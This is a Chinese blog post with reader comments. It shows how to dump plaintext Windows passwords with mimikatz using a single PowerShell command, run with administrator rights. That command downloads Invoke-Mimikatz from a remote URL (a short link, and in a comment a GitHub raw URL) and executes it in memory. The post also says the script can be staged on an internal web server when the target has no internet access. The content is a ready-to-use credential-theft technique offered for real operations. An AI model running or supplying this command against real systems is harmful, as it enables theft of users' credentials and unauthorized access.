正在阅读:

一句powershell调用mimikatz抓密码

20,776

mimikatz神器大家都知道吧,可以抓取系统内的明文密码,但是平时我们测试的时候需要把mimikatz的几个文件上传到目标系统上面,然后再手工执行几个命令才能搞定,今天无意访问一个大神的博客,发现其实可以利用powershell一句话搞定,是国外大神的方法。

国外大神clymb3r写的一个powershell脚本将mimikatz注入到内存调用logonPasswords获取密码,使用起来相当轻便。

以管理员权限启动CMD执行下以命令即可:

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

powershell1

powershell2

实战中如果机器不能上外网可以将脚本下载回来放到内网的web service上。

原文转自:http://www.secoff.net/archives/389.html

目前有:1条访客评论,博主回复1

  1. hackcoll
    2018-05-26 21:23

    [/调皮] 博主http://is.gd/被墙了 需要重新生成短网址才能用

    • 独自等待
      2018-05-28 11:39

      我这里可以的呀, 你那里把网址修改为https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1

留下脚印,证明你来过。

*

*

流汗坏笑撇嘴大兵流泪发呆抠鼻吓到偷笑得意呲牙亲亲疑问调皮可爱白眼难过愤怒惊讶鼓掌